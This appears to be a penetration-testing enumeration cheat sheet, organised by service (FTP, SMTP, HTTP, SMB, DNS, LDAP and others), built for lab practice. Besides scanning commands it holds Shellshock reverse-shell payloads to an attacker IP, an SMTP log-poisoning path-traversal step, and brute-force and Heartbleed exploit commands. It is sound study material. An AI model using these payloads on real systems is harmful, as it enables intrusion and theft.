# Enumeration
## Good Enumeration Guides:
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
## **FTP**
```bash
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21
```
### ncFTP
```bash
# apt install ncftp
ncftp 10.10.10.115
```
## **SSH**
**Tutorial from** [**g0tmi1k**](https://blog.g0tmi1k.com/2010/04/pwnos/)
```bash
Debia OpenSSH Weak SSH keys
https://blog.g0tmi1k.com/2010/04/pwnos/
```
## **SMTP**
SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email-addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails.
```bash
Commands:
HELO -
EHLO - Extended SMTP.
STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify is the email user's mailbox exists.
```
We can manually try to find out which usernames are in the database. This can be done in the following way.
```bash
nc 192.168.1.103 25
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY roooooot
550 5.1.1 : Recipient address rejected: User unknown in local recipient table
```
Here we have managed to identify the user root. But roooooot was rejected. VRFY, EXPN and RCPT can be used to identify users. Telnet is a bit more friendly some times. So always use that too
```bash
telnet 10.11.1.229 25
```
Using nmap to automate the enumeration of users.
```bash
nmap -script smtp-commands.nse 192.168.1.101
nmap –script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vulncve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
```
```bash
# Using the smtp-user-enum tool.
# -M for mode. -U for userlist. -t for target
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 192.168.1.103
```
Using SMTP for log contamination. Watch the video from ippsec on [Beep ](https://youtu.be/XJmBpOd__N8?t=1878)
```bash
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
.
250 2.0.0 Ok: queue as 03655D92F7
Then:
GET /example/page?=../../../../../../../var/mail/asterisk%00&module=Accounts&action?ipp=ls
```
## **HTTP**
Check ippsec video on [Shocker](https://www.youtube.com/watch?v=IBlTdguhgfY\&t=530s)
### Shellshock
```bash
# Shellshock
nmap --scrip shellshock --script-args uri=/cgi-bin -p 80 10.10.10.15
# Testing Shellshock using curl
curl -x 10.10.10.15 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 10.10.10.15:8080 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status
#Shellshock over SSH
ssh username@10.10.10.15 '() { :;}; /bin/bash'
```
### Nikto
```bash
# Nikto
nikto -h 10.10.10.10
```
### Gobuster
```bash
# Gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
# Specifying a user agent
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
# searching for specifc extensions
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
```
### WordPress Scanner
```bash
# WPScan
wpscan -u 10.10.10.10/wp/
```
### WebDAV Scanner
```bash
# Davtest
davtest -url http://10.11.1.15
```
## **HTTPS**
```bash
# Heartbleed Vuln status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
# Checking if a page is vulnerable to heartbleed
sslscan 192.168.101.1:443
or
nmap -sV --script=ssl-heartbleed 192.168.101.8
# You can also exploit the vulnerability using Burp and Metasploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run
```
## **POP3**
```bash
To login:
telnet 10.11.1.13 110
USER adam
PASS adam123
To list messages:
LIST
To retrieve message:
RETR
To exit:
QUIT
```
## **RPC**
```bash
nmap -p 111 –script=rcpinfo 10.11.1.13
rpcclient -U "" -N 10.10.10.8
rcpinfo -p 10.11.1.13
rcpclient -U username 10.11.1.13
Commands:
srvinfo
enum
enumalsgroups
enumdomains
enumdrivers
enumkey
enumprivs
enumdata
enumdomgroups
enumforms
enumports
enumtrust
enumdataex
enumdomusers
enumjobs
enumprinter
lookupnames administrator
queryuser 500
```
## **SMB**
Enumeration and vulnerability scanning with nmap. Add your target IP address after pasting the command in your terminal.
```bash
nmap -p 139,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse
nmap -p 139,445 -vv --script vuln
nmap -p 139,445 -vv --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enumprocesses.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enumusers.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-printtext.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smbsystem-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vulnms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse
nmap -p 139,445 -vv --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery
```
### Using smbmap
```
smbmap -H 10.11.1.128 -u Admin -p "Password"
smbmap -H 10.11.1.13
smbmap -H 10.11.1.13 -u Doesnexist
```
### Using smbclient
```
smbclient -L //10.11.1.13
smbclient -L //10.11.1.13/ipc$ -U John
smbclient \\10.11.1.13\Admin$ -U john
```
### Mount the smb share
```
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/sharename /mnt/cifs
mount -t cifs -o user=admin -o vers=1.0 //10.11.1.128/share smb
```
### Check smb file sharing
```
showmount -e 10.11.1.128
```
### crackmapexec
```
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
```
## **NFS**
```bash
# enumerate share
showmount -e 10.10.11.12
# Mounting the share
mount -t nfs 192.168.100.25:/home /tmp/infosec
https://resources.infosecinstitute.com/exploiting-nfs-share/
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
```
## **SNMP**
```bash
snmpwalk -c public -v1 10.0.0.0
snmpcheck -t 192.168.1.X -c public
onesixtyone -c names -i hosts
nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
snmpenum -t 192.168.1.X
```
## **MySQL**
```bash
nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysqldatabases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysqlquery,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1
```
### **SQL Server**
Reference:
```
nmap -p1433 10.10.10.16 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt
```
## **DNS**
**Important DNS records:**
```
A (address) records: containing the IP address of the domain.
MX records: stands for Mail Exchange, contain the mail exchange servers.
CNAME records: used for aliasing domains. CNAME stands for Canonical Name and links any sub-domains with existing domain DNS records.
NS records: which stands for Name Server, indicates the authoritative (or main) name server for the domain.
SOA records: which stands for State of Authority, contain important information about the domain such as the primary name server, a timestamp showing when the domain was last updated and the party responsible for the domain.
PTR or Pointer Records: map an IPv4 address to the CNAME on the host. This record is also called a ‘reverse record’ because it connects a record with an IP address to a hostname instead of the other way around.
TXT records: contain text inserted by the administrator (such as notes about the way the network has been configured).
```
```bash
# Zone Transfer
dig axfr megacorp.local @10.10.10.179
# Windows:
nslookup
set type=any
ls -d blah.com
# DNS IP Lookup
dig a @
# MX Record Lookup
dig mx @
# Whois Enumeration
whois
# DNSRecon Tool
dnsrecon -d 10.11.1.13 -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
#Zone Transfer
dnsrecon -d example.com -t axfr
# Find Active Directory using DNS
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='labs.test.com'"
```
## **Telnet**
```bash
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet
```
## **RDP**
```bash
ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1
# Then use rdesktop to login
rdesktop 192.168.1.10
```
## **LDAP**
```bash
# You will get whatever object that is at the base of the directory:
ldapsearch -LLL -x -h ldap.example.com -p 3389 -s base '(objectclass=*)'
# IPSEC - LightWeight
ldapsearch -x -h 10.10.10.107 -s base namingcontext
# Then from the output, you would do:
ldapsearch -x -h 10.10.10.107 -b "dc=hackthebox,dc=htb"
# From Impacket
GetADUsers.py -all -dc-ip {ip} {domain/username}
# Nmap using LDAP script
nmap -p 389 --script ldap-search ypuffy.htb
```
## **Kerberos**
```
Kerberoasting -> GetNPUsers.py
```
Good references on kerberos exploitation: